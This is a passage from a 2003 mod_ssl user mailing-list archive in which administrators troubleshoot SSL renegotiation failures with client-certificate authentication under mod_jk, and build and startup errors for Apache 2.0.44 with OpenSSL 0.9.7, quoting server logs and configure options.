OpenSSL: Loop: before/accept initialization
[Connection to child 5 established (server www-sps.sps.fms.treas.gov:443,
client 164.95.119.43)
Seeding PRNG with 1160 bytes of entropy
OpenSSL: Handshake: start
OpenSSL: Loop: before/accept initialization
OpenSSL: Loop: SSLv3 read client hello A
OpenSSL: Loop: SSLv3 write server hello A
OpenSSL: Loop: SSLv3 write certificate A
OpenSSL: Loop: SSLv3 write key exchange A
OpenSSL: Loop: SSLv3 write server done A
OpenSSL: Loop: SSLv3 flush data
OpenSSL: Loop: SSLv3 read client key exchange A
OpenSSL: Loop: SSLv3 read finished A
OpenSSL: Loop: SSLv3 write change cipher spec A
OpenSSL: Loop: SSLv3 write finished A
OpenSSL: Loop: SSLv3 flush data
....


In contrast, when SSLVerifyClient is 'none', mod_jk log shows

Attempting to map URI '/app/servlet/ApplicationProxyServlet'
jk_uri_worker_map_t::map_uri_to_worker, Found a context match ajp13 ->
/app/servlet/
Into wc_get_worker_for_name ajp13
wc_get_worker_for_name, done  found a worker
Into jk_worker_t::get_endpoint
In jk_endpoint_t::ajp_get_endpoint, time elapsed since last request = 534
seconds
Into jk_endpoint_t::service
Into ajp_marshal_into_msgb
ajp_marshal_into_msgb - Done
sending to ajp13 #261
ajp_send_request 2: request body to send 4708 - request body to resend 0
sending to ajp13 #4714
received from ajp13 #3
sending to ajp13 #4
received from ajp13 #3
sending to ajp13 #4
received from ajp13 #49
ajp_unmarshal_response: status = 200
ajp_unmarshal_response: Number of headers is = 2
ajp_unmarshal_response: Header[0] [Content-Type] = [application/octet-stream]
ajp_unmarshal_response: Header[1] [Content-Length] = [17776]
received from ajp13 #1028
received from ajp13 #1028
received from ajp13 #1028
received from ajp13 #1028
received from ajp13 #1028
received from ajp13 #1028
received from ajp13 #1028
received from ajp13 #1028
received from ajp13 #1028
...

and the SSL engine log shows

Connection to child 1 established (server www-sps.sps.fms.treas.gov:443,
client 164.95.119.43)
Seeding PRNG with 1160 bytes of entropy
OpenSSL: Handshake: start
OpenSSL: Loop: before/accept initialization
OpenSSL: Loop: SSLv3 read client hello A
OpenSSL: Loop: SSLv3 write server hello A
OpenSSL: Loop: SSLv3 write certificate A
OpenSSL: Loop: SSLv3 write key exchange A
OpenSSL: Loop: SSLv3 write server done A
OpenSSL: Loop: SSLv3 flush data
OpenSSL: Loop: SSLv3 read client key exchange A
OpenSSL: Loop: SSLv3 read finished A
OpenSSL: Loop: SSLv3 write change cipher spec A
OpenSSL: Loop: SSLv3 write finished A
OpenSSL: Loop: SSLv3 flush data
Inter-Process Session Cache: request=SET status=OK
id=7D883EF0B18F9E84BC57C4F02C6E34ADF6FF049BB7091F16B303B79AC906832B
timeout=295s (session caching)
OpenSSL: Handshake: done
Connection: Client IP: 164.95.119.43, Protocol: TLSv1, Cipher:
EDH-RSA-DES-CBC3-SHA (168/168 bits)
Initial (No.1) HTTPS request received for child 1 (server
www-sps.sps.fms.treas.gov:443)
OpenSSL: Write: SSL negotiation finished successfully
Connection to child 1 closed with standard shutdown (server
www-sps.sps.fms.treas.gov:443, client 164.95.119.43)
Connection to child 5 established (server www-sps.sps.fms.treas.gov:443,
client 164.95.119.43)
Seeding PRNG with 1160 bytes of entropy
OpenSSL: Handshake: start
OpenSSL: Loop: before/accept initialization
Inter-Process Session Cache: request=GET status=FOUND
id=DD717A9F7EB2C33D51E1E33C01CB26E57BFD08D4666799528508521CE66F4334 (session
reuse)
OpenSSL: Loop: SSLv3 read client hello A
OpenSSL: Loop: SSLv3 write server hello A
OpenSSL: Loop: SSLv3 write change cipher spec A
OpenSSL: Loop: SSLv3 write finished A
OpenSSL: Loop: SSLv3 flush data
OpenSSL: Loop: SSLv3 read finished A
OpenSSL: Handshake: done
Connection: Client IP: 164.95.119.43, Protocol: SSLv3, Cipher:
EXP1024-RC4-SHA (56/128 bits)
Initial (No.1) HTTPS request received for child 5 (server
www-sps.sps.fms.treas.gov:443)

I've spent a couple of days trying to figure this out and have not made any
progress. Can anyone help out? TIA.

-a
-- 
Aaron Stromas         | "Tik-tik-tik!!!... ja, Pantani is weg..."
ams@izoard.com        | BRTN commentator
+1 (301) 493 4933     | L'Alpe d'Huez
http://www.izoard.com | 1995 Tour de France



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar  7 14:55:40 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 992522AA027; Fri,  7 Mar 2003 14:55:40 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gavia.izoard.com (w044.z064003036.was-dc.dsl.cnc.net [64.3.36.44])
	by master.modssl.org (Postfix) with ESMTP id 8C81E2AA01F
	for ; Fri,  7 Mar 2003 14:55:34 +0100 (CET)
Received: from mortirolo.izoard.com ([192.168.0.50] helo=izoard.com)
	by gavia.izoard.com with smtp (Exim 3.35 #1 (Debian))
	id 18rIJw-0004WZ-00; Fri, 07 Mar 2003 08:55:32 -0500
Received: from 199.196.144.16
        (SquirrelMail authenticated user ams)
        by www.izoard.com with HTTP;
        Fri, 7 Mar 2003 08:55:32 -0500 (EST)
Message-ID: <52661.199.196.144.16.1047045332.squirrel@www.izoard.com>
Date: Fri, 7 Mar 2003 08:55:32 -0500 (EST)
Subject: Re: mod_ssl/mod_jk failure with client authentication on
From: "Aaron Stromas" 
To: 
In-Reply-To: <47527.199.196.144.16.1047043195.squirrel@www.izoard.com>
References: <47527.199.196.144.16.1047043195.squirrel@www.izoard.com>
Cc: 
X-Mailer: SquirrelMail (version 1.2.0 [rc2])
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aaron Stromas" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I realised that I included irrelevant log snipet from the SSL log. Please
see the correction below.

Aaron Stromas said:
> Hi,
>
> I apologise for cross-posting - I'm really not sure which component is
> at fault, looks like mod_ssl but possibly mod_jk. BTW, is there a list
> (or some other venue) dedicated to mod_jk?
>
> My environment is Apache 1.3.22, mod_ssl 2.8.5, OpenSSL 0.9.6b, tomcat
> 4.0.3. I have a servlet mounted like this
>
> JkMount /app/servlet/* ajp13
> JkMount /app/*.jsp ajp13
> 
>        SSLVerifyClient require
>        SSLVerifyDepth  4
> 
>
> When SSLVerifyClient is set to 'none' all works fine, but when I set it
> as above, to 'require', it seems that the SSL connection is repetedly
> renegotiated. The mod_jk log stop at this line (I edited out log entry
> headers for clarity):
>
> Attempting to map URI '/app/servlet/ApplicationProxyServlet'
> jk_uri_worker_map_t::map_uri_to_worker, Found a context match ajp13 ->
> /app/servlet/
>
> whilst the ssl engine log shows this
> Connection to child 3 established (server
> www-sps.sps.fms.treas.gov:443, client 164.95.119.43)
> Seeding PRNG with 1160 bytes of entropy
> OpenSSL: Handshake: start
> OpenSSL: Loop: before/accept initialization
> Inter-Process Session Cache: request=GET status=FOUND
> id=7A2A7121DDC60F144CA9F233A19E7BD7D88F0DCA06AEB588165EB9F01CA276DE
> (session reuse)
> OpenSSL: Loop: SSLv3 read client hello A
> OpenSSL: Loop: SSLv3 write server hello A
> OpenSSL: Loop: SSLv3 write change cipher spec A
> OpenSSL: Loop: SSLv3 write finished A
> OpenSSL: Loop: SSLv3 flush data
> OpenSSL: Loop: SSLv3 read finished A
> OpenSSL: Handshake: done
> Connection: Client IP: 164.95.119.43, Protocol: SSLv3, Cipher:
> EXP1024-RC4-SHA (56/128 bits)
> Initial (No.1) HTTPS request received for child 3 (server
> www-sps.sps.fms.treas.gov:443)
> OpenSSL: Write: SSL negotiation finished successfully
> Connection to child 3 closed with standard shutdown (server
> www-sps.sps.fms.treas.gov:443, client 164.95.119.43)
> Connection to child 4 established (server
> www-sps.sps.fms.treas.gov:443, client 164.95.119.43)
> Seeding PRNG with 1160 bytes of entropy
> OpenSSL: Handshake: start
> OpenSSL: Loop: before/accept initialization
> [Connection to child 5 established (server
> www-sps.sps.fms.treas.gov:443, client 164.95.119.43)
> Seeding PRNG with 1160 bytes of entropy
> OpenSSL: Handshake: start
> OpenSSL: Loop: before/accept initialization
> OpenSSL: Loop: SSLv3 read client hello A
> OpenSSL: Loop: SSLv3 write server hello A
> OpenSSL: Loop: SSLv3 write certificate A
> OpenSSL: Loop: SSLv3 write key exchange A
> OpenSSL: Loop: SSLv3 write server done A
> OpenSSL: Loop: SSLv3 flush data
> OpenSSL: Loop: SSLv3 read client key exchange A
> OpenSSL: Loop: SSLv3 read finished A
> OpenSSL: Loop: SSLv3 write change cipher spec A
> OpenSSL: Loop: SSLv3 write finished A
> OpenSSL: Loop: SSLv3 flush data
> ....
  [ more SSL handshake]

OpenSSL: Handshake: done
Connection: Client IP: 164.95.119.43, Protocol: TLSv1, Cipher:
EDH-RSA-DES-CBC3-SHA (168/168 bits)
Initial (No.1) HTTPS request received for child 1 (server
www-sps.sps.fms.treas.gov:443)
Changed client verification type will force renegotiation
Requesting connection re-negotiation
Performing full renegotiation: complete handshake protocol
OpenSSL: Write: SSL negotiation finished successfully
Connection to child 0 closed with standard shutdown (server
www-sps.sps.fms.treas.gov:443, client 164.95.119.43)
I/O: sucked 4708 bytes of input data from SSL/TLS I/O layer for delayed
injection into Apache I/O layer
OpenSSL: Handshake: start
OpenSSL: Loop: SSL renegotiate ciphers
OpenSSL: Loop: SSLv3 write hello request A
OpenSSL: Loop: SSLv3 flush data
Awaiting re-negotiation handshake
OpenSSL: Handshake: start
OpenSSL: Loop: before accept initialization
Inter-Process Session Cache: request=REM status=OK
id=38B1D98C2B4A6384FA080BDD4374ACE13881B23AD58834437874A1F03733FCFE (session
dead)
Write: SSLv3 read client hello B
OpenSSL: Exit: error in SSLv3 read client hello B
Re-negotiation handshake failed: Not accepted by client!?
I/O: injecting 4708 bytes of pre-sucked data into Apache I/O layer
OpenSSL: Write: SSLv3 read client hello B
OpenSSL: Exit: error in SSLv3 read client hello B
SSL error on writing data (OpenSSL library error follows)
OpenSSL: error:140940F5:SSL routines:SSL3_READ_BYTES:unexpected record
Connection to child 1 closed with standard shutdown (server
www-sps.sps.fms.treas.gov:443, client 164.95.119.43)


>
>
> In contrast, when SSLVerifyClient is 'none', mod_jk log shows
>
> Attempting to map URI '/app/servlet/ApplicationProxyServlet'
> jk_uri_worker_map_t::map_uri_to_worker, Found a context match ajp13 ->
> /app/servlet/
> Into wc_get_worker_for_name ajp13
> wc_get_worker_for_name, done  found a worker
> Into jk_worker_t::get_endpoint
> In jk_endpoint_t::ajp_get_endpoint, time elapsed since last request =
> 534 seconds
> Into jk_endpoint_t::service
> Into ajp_marshal_into_msgb
> ajp_marshal_into_msgb - Done
> sending to ajp13 #261
> ajp_send_request 2: request body to send 4708 - request body to resend
> 0 sending to ajp13 #4714
> received from ajp13 #3
> sending to ajp13 #4
> received from ajp13 #3
> sending to ajp13 #4
> received from ajp13 #49
> ajp_unmarshal_response: status = 200
> ajp_unmarshal_response: Number of headers is = 2
> ajp_unmarshal_response: Header[0] [Content-Type] =
> [application/octet-stream] ajp_unmarshal_response: Header[1]
> [Content-Length] = [17776]
> received from ajp13 #1028
> received from ajp13 #1028
> received from ajp13 #1028
> received from ajp13 #1028
> received from ajp13 #1028
> received from ajp13 #1028
> received from ajp13 #1028
> received from ajp13 #1028
> received from ajp13 #1028
> ...
>
> and the SSL engine log shows
>
> Connection to child 1 established (server
> www-sps.sps.fms.treas.gov:443, client 164.95.119.43)
> Seeding PRNG with 1160 bytes of entropy
> OpenSSL: Handshake: start
> OpenSSL: Loop: before/accept initialization
> OpenSSL: Loop: SSLv3 read client hello A
> OpenSSL: Loop: SSLv3 write server hello A
> OpenSSL: Loop: SSLv3 write certificate A
> OpenSSL: Loop: SSLv3 write key exchange A
> OpenSSL: Loop: SSLv3 write server done A
> OpenSSL: Loop: SSLv3 flush data
> OpenSSL: Loop: SSLv3 read client key exchange A
> OpenSSL: Loop: SSLv3 read finished A
> OpenSSL: Loop: SSLv3 write change cipher spec A
> OpenSSL: Loop: SSLv3 write finished A
> OpenSSL: Loop: SSLv3 flush data
> Inter-Process Session Cache: request=SET status=OK
> id=7D883EF0B18F9E84BC57C4F02C6E34ADF6FF049BB7091F16B303B79AC906832B
> timeout=295s (session caching)
> OpenSSL: Handshake: done
> Connection: Client IP: 164.95.119.43, Protocol: TLSv1, Cipher:
> EDH-RSA-DES-CBC3-SHA (168/168 bits)
> Initial (No.1) HTTPS request received for child 1 (server
> www-sps.sps.fms.treas.gov:443)
> OpenSSL: Write: SSL negotiation finished successfully
> Connection to child 1 closed with standard shutdown (server
> www-sps.sps.fms.treas.gov:443, client 164.95.119.43)
> Connection to child 5 established (server
> www-sps.sps.fms.treas.gov:443, client 164.95.119.43)
> Seeding PRNG with 1160 bytes of entropy
> OpenSSL: Handshake: start
> OpenSSL: Loop: before/accept initialization
> Inter-Process Session Cache: request=GET status=FOUND
> id=DD717A9F7EB2C33D51E1E33C01CB26E57BFD08D4666799528508521CE66F4334
> (session reuse)
> OpenSSL: Loop: SSLv3 read client hello A
> OpenSSL: Loop: SSLv3 write server hello A
> OpenSSL: Loop: SSLv3 write change cipher spec A
> OpenSSL: Loop: SSLv3 write finished A
> OpenSSL: Loop: SSLv3 flush data
> OpenSSL: Loop: SSLv3 read finished A
> OpenSSL: Handshake: done
> Connection: Client IP: 164.95.119.43, Protocol: SSLv3, Cipher:
> EXP1024-RC4-SHA (56/128 bits)
> Initial (No.1) HTTPS request received for child 5 (server
> www-sps.sps.fms.treas.gov:443)
>
> I've spent a couple of days trying to figure this out and have not made
> any progress. Can anyone help out? TIA.
>
> -a
> --
> Aaron Stromas         | "Tik-tik-tik!!!... ja, Pantani is weg..."
> ams@izoard.com        | BRTN commentator
> +1 (301) 493 4933     | L'Alpe d'Huez
> http://www.izoard.com | 1995 Tour de France
>
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


-- 
Aaron Stromas         | "Tik-tik-tik!!!... ja, Pantani is weg..."
ams@izoard.com        | BRTN commentator
+1 (301) 493 4933     | L'Alpe d'Huez
http://www.izoard.com | 1995 Tour de France



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar  7 15:21:05 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B9A682AA027; Fri,  7 Mar 2003 15:21:05 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from huggins.bsd.uchicago.edu (huggins.bsd.uchicago.edu [128.135.182.72])
	by master.modssl.org (Postfix) with ESMTP id EAFBC2AA01F
	for ; Fri,  7 Mar 2003 15:21:03 +0100 (CET)
Received: from huggins.bsd.uchicago.edu (localhost [127.0.0.1])
	by huggins.bsd.uchicago.edu (8.12.8/8.12.8) with ESMTP id h27EG0hg010556
	for ; Fri, 7 Mar 2003 08:16:00 -0600 (CST)
Received: (from nobody@localhost)
	by huggins.bsd.uchicago.edu (8.12.8/8.12.8/Submit) id h27EFxlN010555
	for modssl-users@modssl.org; Fri, 7 Mar 2003 08:15:59 -0600 (CST)
X-Authentication-Warning: huggins.bsd.uchicago.edu: nobody set sender to imiller@bsd.uchicago.edu using -f
Received: from bslc018-x86-f.bsd.uchicago.edu (bslc018-x86-f.bsd.uchicago.edu [128.135.217.140]) 
	by webemail.bsd.uchicago.edu (IMP) with HTTP 
	for ; Fri,  7 Mar 2003 08:15:59 -0600
Message-ID: <1047046559.3e68a99f7c85c@webemail.bsd.uchicago.edu>
Date: Fri,  7 Mar 2003 08:15:59 -0600
From: Ian Miller 
To: modssl-users@modssl.org
Subject: Re: Apache 2.0.44 with Openssl -0.9.7
References: 
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: Internet Messaging Program (IMP) 3.2
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ian Miller 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Did you uncomment out the entropy lines in the ssl.conf file?
I am running it with 0.9.7a and it works fine 
-Ian 
Quoting "Yu, Ming" :

> Does anyone have problem with apache 2.0.44 and Openssl 0.9.7.
> I installed the server, no problem.  Then I wanted to start the httpd
> server, even without mod_ssl.  
> 
> ./apachectl -k start
> 
> There is no message on the screen, but an error message in the log file.
> The apache engine did not start.
> 
> [warn] Init: PRNG still contains insufficient entropy!
> [error] Init: Failed to generate temporary 512 bit RSA private key
> Configuration Failed
> 
> Any suggestions.
> 
> - Ming Yu
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


-- 
Ian Miller
Sr. Systems Engineer
University of Chicago
imiller@bsd.uchicago.edu
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar  7 16:36:09 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 957AB2AA027; Fri,  7 Mar 2003 16:36:09 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lytehouse.net (209-183-162-200.x.newroadstelecom.net [209.183.162.200])
	by master.modssl.org (Postfix) with ESMTP id 629A72AA01F
	for ; Fri,  7 Mar 2003 16:36:07 +0100 (CET)
Received: from smtp.lytehouse.net (smtp.lytehouse.net [209.183.162.200])
	by lytehouse.net (8.12.5/8.12.5) with ESMTP id h27Fa5ea021614
	for ; Fri, 7 Mar 2003 09:36:05 -0600
Date: Fri, 7 Mar 2003 09:36:02 -0600 (CST)
From: Ted Rolle 
X-X-Sender: ted@localhost.localdomain
To: modssl-users@modssl.org
Subject: Re: Apache 2.0.44 with Openssl -0.9.7
In-Reply-To: <1047046559.3e68a99f7c85c@webemail.bsd.uchicago.edu>
Message-ID: 
References: 
 <1047046559.3e68a99f7c85c@webemail.bsd.uchicago.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ted Rolle 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

YOU GOT Apache-2.0.44 and OpenSSL-0.9.7 WORKING???
What are your ./configure files like?  I keep getting the dreaded "can't
find X509_free" message.

On Fri, 7 Mar 2003, Ian Miller wrote:

>
> Did you uncomment out the entropy lines in the ssl.conf file?
> I am running it with 0.9.7a and it works fine
> -Ian
> Quoting "Yu, Ming" :
>
> > Does anyone have problem with apache 2.0.44 and Openssl 0.9.7.
> > I installed the server, no problem.  Then I wanted to start the httpd
> > server, even without mod_ssl.
> >
> > ./apachectl -k start
> >
> > There is no message on the screen, but an error message in the log file.
> > The apache engine did not start.
> >
> > [warn] Init: PRNG still contains insufficient entropy!
> > [error] Init: Failed to generate temporary 512 bit RSA private key
> > Configuration Failed
> >
> > Any suggestions.
> >
> > - Ming Yu
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
>
> --
> Ian Miller
> Sr. Systems Engineer
> University of Chicago
> imiller@bsd.uchicago.edu
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar  7 16:41:47 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B0D252AA027; Fri,  7 Mar 2003 16:41:47 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (dav67.law15.hotmail.com [64.4.22.202])
	by master.modssl.org (Postfix) with ESMTP id 232842AA01F
	for ; Fri,  7 Mar 2003 16:41:46 +0100 (CET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Fri, 7 Mar 2003 07:41:43 -0800
X-Originating-IP: [66.46.24.157]
From: "apachep2" 
To: 
Subject: RE: Apache 2.0.44 with Openssl -0.9.7
Date: Fri, 7 Mar 2003 10:42:08 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Importance: Normal
X-OriginalArrivalTime: 07 Mar 2003 15:41:43.0525 (UTC) FILETIME=[0DBEB150:01C2E4C0]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "apachep2" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

It looks like many people getting this "undefined symbol X509_free" when
we try to build mod_ssl as a shared module. I am still waiting for the
solution.

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Ted Rolle
Sent: March 7, 2003 10:36 AM
To: modssl-users@modssl.org
Subject: Re: Apache 2.0.44 with Openssl -0.9.7

YOU GOT Apache-2.0.44 and OpenSSL-0.9.7 WORKING???
What are your ./configure files like?  I keep getting the dreaded "can't
find X509_free" message.

On Fri, 7 Mar 2003, Ian Miller wrote:

>
> Did you uncomment out the entropy lines in the ssl.conf file?
> I am running it with 0.9.7a and it works fine
> -Ian
> Quoting "Yu, Ming" :
>
> > Does anyone have problem with apache 2.0.44 and Openssl 0.9.7.
> > I installed the server, no problem.  Then I wanted to start the
httpd
> > server, even without mod_ssl.
> >
> > ./apachectl -k start
> >
> > There is no message on the screen, but an error message in the log
file.
> > The apache engine did not start.
> >
> > [warn] Init: PRNG still contains insufficient entropy!
> > [error] Init: Failed to generate temporary 512 bit RSA private key
> > Configuration Failed
> >
> > Any suggestions.
> >
> > - Ming Yu
> >
______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)
www.modssl.org
> > User Support Mailing List
modssl-users@modssl.org
> > Automated List Manager
majordomo@modssl.org
> >
>
>
> --
> Ian Miller
> Sr. Systems Engineer
> University of Chicago
> imiller@bsd.uchicago.edu
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar  7 16:57:29 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 919B62AA027; Fri,  7 Mar 2003 16:57:29 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from aples1.jhuapl.edu (aples1.jhuapl.edu [128.244.26.85])
	by master.modssl.org (Postfix) with ESMTP id DF31E2AA01F
	for ; Fri,  7 Mar 2003 16:57:27 +0100 (CET)
Received: by aples1.jhuapl.edu with Internet Mail Service (5.5.2653.19)
	id <1QHC5XKF>; Fri, 7 Mar 2003 10:56:50 -0500
Message-ID: 
From: "Yu, Ming" 
To: "'modssl-users@modssl.org'" 
Subject: RE: Apache 2.0.44 with Openssl -0.9.7
Date: Fri, 7 Mar 2003 10:57:07 -0500 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Yu, Ming" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I use the following switches to compile APACHE 2.0.44 with OpenSSL 0.9.7
./configure --enable-layout=TEST \
		--enable-ssl \
		--with-ssl=/usr/local/ssl \
		--enable-mods-shared=max \
		--enable-modules=most \
		--with-mpm=worker

It went through the installation process. 

Thanks 

- Ming Yu

-----Original Message-----
From: Ted Rolle [mailto:ted@php.net] 
Sent: Friday, March 07, 2003 10:36 AM
To: modssl-users@modssl.org
Subject: Re: Apache 2.0.44 with Openssl -0.9.7


YOU GOT Apache-2.0.44 and OpenSSL-0.9.7 WORKING???
What are your ./configure files like?  I keep getting the dreaded "can't
find X509_free" message.

On Fri, 7 Mar 2003, Ian Miller wrote:

>
> Did you uncomment out the entropy lines in the ssl.conf file? I am 
> running it with 0.9.7a and it works fine -Ian
> Quoting "Yu, Ming" :
>
> > Does anyone have problem with apache 2.0.44 and Openssl 0.9.7. I 
> > installed the server, no problem.  Then I wanted to start the httpd 
> > server, even without mod_ssl.
> >
> > ./apachectl -k start
> >
> > There is no message on the screen, but an error message in the log 
> > file. The apache engine did not start.
> >
> > [warn] Init: PRNG still contains insufficient entropy! [error] Init: 
> > Failed to generate temporary 512 bit RSA private key Configuration 
> > Failed
> >
> > Any suggestions.
> >
> > - Ming Yu 
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
>
> --
> Ian Miller
> Sr. Systems Engineer
> University of Chicago
> imiller@bsd.uchicago.edu 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar  7 17:19:04 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6C47D2AA027; Fri,  7 Mar 2003 17:19:04 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (dav37.law15.hotmail.com [64.4.22.94])
	by master.modssl.org (Postfix) with ESMTP id C23A42AA01F
	for ; Fri,  7 Mar 2003 17:18:46 +0100 (CET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Fri, 7 Mar 2003 08:18:44 -0800
X-Originating-IP: [66.46.24.157]
From: "apachep2" 
To: 
Subject: RE: Apache 2.0.44 with Openssl -0.9.7
Date: Fri, 7 Mar 2003 11:19:09 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Importance: Normal
X-OriginalArrivalTime: 07 Mar 2003 16:18:44.0237 (UTC) FILETIME=[396473D0:01C2E4C5]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "apachep2" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Of course. When you build mod_ssl into apache (that is STATIC), you
won't encounter X509_free issue.

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Yu, Ming
Sent: March 7, 2003 10:57 AM
To: 'modssl-users@modssl.org'
Subject: RE: Apache 2.0.44 with Openssl -0.9.7

I use the following switches to compile APACHE 2.0.44 with OpenSSL 0.9.7
./configure --enable-layout=TEST \
		--enable-ssl \
		--with-ssl=/usr/local/ssl \
		--enable-mods-shared=max \
		--enable-modules=most \
		--with-mpm=worker

It went through the installation process. 

Thanks 

- Ming Yu

-----Original Message-----
From: Ted Rolle [mailto:ted@php.net] 
Sent: Friday, March 07, 2003 10:36 AM
To: modssl-users@modssl.org
Subject: Re: Apache 2.0.44 with Openssl -0.9.7


YOU GOT Apache-2.0.44 and OpenSSL-0.9.7 WORKING???
What are your ./configure files like?  I keep getting the dreaded "can't
find X509_free" message.

On Fri, 7 Mar 2003, Ian Miller wrote:

>
> Did you uncomment out the entropy lines in the ssl.conf file? I am 
> running it with 0.9.7a and it works fine -Ian
> Quoting "Yu, Ming" :
>
> > Does anyone have problem with apache 2.0.44 and Openssl 0.9.7. I 
